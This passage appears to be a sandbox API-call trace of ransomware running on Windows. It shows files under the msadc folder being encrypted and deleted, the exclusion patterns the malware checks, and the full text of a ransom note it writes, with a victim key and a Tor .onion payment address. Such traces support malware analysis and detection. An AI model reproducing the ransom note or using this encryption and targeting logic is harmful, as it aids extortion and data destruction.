hTemplateFile=0x0) returned 0x15b0 [0168.365] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=623) returned 1 [0168.365] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.365] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.380] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.380] GetLastError () returned 0x0 [0168.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.410] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.410] GetLastError () returned 0x0 [0168.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x6f, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x6f, lpOverlapped=0x0) returned 1 [0168.410] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x6f, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0168.410] GetLastError () returned 0x0 [0168.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0168.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0168.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0168.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20 [0168.411] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", dwFileAttributes=0x20) returned 0 [0168.411] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 1 [0168.411] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0 [0168.411] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" [0168.411] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned 1 [0168.412] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX56C.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx56c.tmp")) returned 0x56c [0168.413] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX56C.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx56c.tmp"), dwFlags=0x1) returned 0 [0168.413] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX56C.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx56c.tmp")) returned 1 [0168.414] CryptDestroyKey (hKey=0x9ad478) returned 1 [0168.414] wcslen (_String="OK") returned 0x2 [0168.414] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.414] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.414] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0168.414] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0168.414] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0168.414] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.414] wcscmp (_String1="en-US", _String2=".") returned 1 [0168.414] wcscmp (_String1="en-US", _String2="..") returned 1 [0168.414] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.414] PathMatchSpecW (pszFile="msadce.dll", pszSpec="*NMCRYPT") returned 0 [0168.414] PathMatchSpecW (pszFile="msadce.dll", pszSpec="*Recovers your files.html") returned 0 [0168.414] PathMatchSpecW (pszFile="msadce.dll", pszSpec="*.exe") returned 0 [0168.414] PathMatchSpecW (pszFile="msadce.dll", pszSpec="*.dll") returned 1 [0168.414] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.414] PathMatchSpecW (pszFile="msadcer.dll", pszSpec="*NMCRYPT") returned 0 [0168.414] PathMatchSpecW (pszFile="msadcer.dll", pszSpec="*Recovers your files.html") returned 0 [0168.414] PathMatchSpecW (pszFile="msadcer.dll", pszSpec="*.exe") returned 0 [0168.414] PathMatchSpecW (pszFile="msadcer.dll", pszSpec="*.dll") returned 1 [0168.414] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.414] PathMatchSpecW (pszFile="msadco.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msadco.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msadco.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msadco.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msadcor.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msadcor.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msadcor.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msadcor.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msadds.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msadds.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msadds.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msadds.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msaddsr.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msaddsr.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msaddsr.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msaddsr.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msdaprsr.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprsr.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprsr.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprsr.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msdaprst.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprst.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprst.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaprst.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msdarem.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msdarem.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msdarem.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msdarem.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msdaremr.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaremr.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaremr.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msdaremr.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.415] PathMatchSpecW (pszFile="msdfmap.dll", pszSpec="*NMCRYPT") returned 0 [0168.415] PathMatchSpecW (pszFile="msdfmap.dll", pszSpec="*Recovers your files.html") returned 0 [0168.415] PathMatchSpecW (pszFile="msdfmap.dll", pszSpec="*.exe") returned 0 [0168.415] PathMatchSpecW (pszFile="msdfmap.dll", pszSpec="*.dll") returned 1 [0168.415] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0168.415] GetLastError () returned 0x12 [0168.416] FindClose (in: hFindFile=0x9ad7f8 | out: hFindFile=0x9ad7f8) returned 1 [0168.416] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\msadc\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0168.416] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.417] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.417] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0168.417] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.417] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.417] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0168.417] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.417] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.417] wcslen (_String="\\\\?\\") returned 0x4 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.exe") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.dll") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.lnk") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.bat") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.ini") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.msi") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*.scf") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0168.417] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*AppData*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*Atheros*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*Realtek*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*boot*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*boot*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*ntldr*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*chrome*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*opera*") returned 0 [0168.418] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", pszSpec="*firefox*") returned 0 [0168.418] wcslen (_String="\\\\?\\") returned 0x4 [0168.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad5f8 [0168.418] wcscmp (_String1=".", _String2=".") returned 0 [0168.418] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.418] wcscmp (_String1="..", _String2=".") returned 1 [0168.418] wcscmp (_String1="..", _String2="..") returned 0 [0168.418] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.418] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*NMCRYPT") returned 0 [0168.418] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0168.418] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.exe") returned 0 [0168.418] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.dll") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.lnk") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.bat") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.ini") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.msi") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*.scf") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*AppData*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\java\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\windows\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*Atheros*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*Realtek*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*bootmgr*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*boot*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*boot*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*IO.SYS*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*ntldr*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*chrome*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*opera*") returned 0 [0168.419] PathMatchSpecW (pszFile="msadcer.dll.mui", pszSpec="*firefox*") returned 0 [0168.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", pszSpec="*") returned 1 [0168.419] strlen (_Str="NMoreira") returned 0x8 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.419] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.420] 